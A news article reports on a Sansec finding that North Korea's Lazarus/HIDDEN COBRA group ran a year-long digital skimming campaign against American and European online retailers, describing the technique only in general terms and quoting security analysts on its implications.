A Dutch cybersecurity firm called Sansec issued a report on Monday accusing North Korean hackers of waging a year-long campaign to steal credit card information from American and European online retailers.
Sansec did not offer an estimate of how much money might have been stolen by the hackers, but it noted cyber-theft campaigns are a major source of revenue for the North Korean military in an era of tight sanctions, including at least $2 billion stolen from primarily South Korean targets in 2019. The biggest online retail target named by Sansec was Claire’s, an online fashion store, which was hit by skimming attacks in April and June.
The hackers belong to a group classified as an Advanced Persistent Threat (APT) under the name “Lazarus” by some security analysts and known as “HIDDEN COBRA” by others.
Beginning in May 2019, the group began expanding from South Korean digital heists in a big way, attacking online retailers in the United States and Europe with a technique known as “digital skimming” or “Magecart,” the latter name derived from a hacking consortium that began targeting online shopping carts in 2015.
Digital skimming is the virtual version of the mechanical skimmers thieves have been known to plant on gas pumps and other easily accessible credit card swipers. In a digital skimming attack, the hackers plant malware code in an online retail site that intercepts transactions and sends the credit card information to a server controlled by the hackers.
Planting this code is generally thought to require administrative access to the targeted website, which Sansec believes APT Lazarus/HIDDEN COBRA obtained using spear-phishing techniques – i.e. using phony emails and booby-trapped websites to trick legitimate users into giving away their login names and passwords.
Phishing campaigns are branching out into social media and text messaging in addition to email, with the added danger that such platforms have fewer defenses against malicious links than the major email providers, and users burned by years of email scams are more likely to respond to phishing texts, tweets, and Facebook posts, or click on poisoned web links contained within them.
One unusual twist in the APT Lazarus/HIDDEN COBRA campaign is that the hackers also stole access to the servers they used to coordinate their global crime wave. Hackers usually set up their own highly secure servers to stash their digital loot, but this group hijacked several commercial servers to receive their stolen credit card numbers until they were ready to sell the data on the dark web, including “a modeling agency from Milan, a vintage music store from Tehran, and a family-run book store from New Jersey.”
Sansec – which, it should be noted, specializes in providing electronic security for online shopping carts – said this particular skimming operation was also different from its largely Russian and Indonesian predecessors because it used techniques and code that have been associated with North Korean state-sponsored hackers.
The virus-laced phishing emails used to obtain the passwords needed to plant the malware were reportedly identical to earlier North Korean phishing attacks, and some of the IP addresses used by the malware are known to be North Korean assets. Sansec’s analysts judged it “extremely unlikely” that all of these similarities could be coincidental.
“Sansec has found proof of global skimming activity that has multiple, independent links to previously documented, North Korea attributed hacking operations. Sansec believes that North Korean state sponsored actors have engaged in large scale digital skimming activity since at least May 2019,” the report concluded.
ZDNet on Tuesday noted the skimming crime wave fits in perfectly with North Korea’s increasingly “brazen hacking campaigns,” including electronic ATM robberies, cryptocurrency scams, and the deeply alarming WannaCry ransomware attack of 2017. WannaCry sent the online community into a panic and threatened to collapse several national economies, and most experts believe it was merely a bungled test run for a much more dangerous hacking campaign Pyongyang plans for the future.
A roundtable of online security analysts put together by Security Magazine on Tuesday saw the North Korean skimming campaign as an ominous development. Contributors noted that skimming is notoriously difficult for system administrators to detect, block, or track once hackers gain access to the shopping cart code on a website, and it is completely invisible to consumers who have no way of knowing their credit card data is being copied and sent to hackers for resale on the black market.
Another troubling idea raised by Security Magazine’s contributors is that credit card numbers are not the only data that can be invisibly skimmed from compromised websites. Virtually anything a user types into the site could be copied, including highly sensitive personal or corporate data.
“It has been discussed in the intelligence circles for years that the boundary between nation state and cybercrime is becoming blurred. Nation state actors have been re-purposing, buying, and using more mainstream cybercrime tools and services to obfuscate their activity,” Netenrich security chief Brandon Hoffman warned.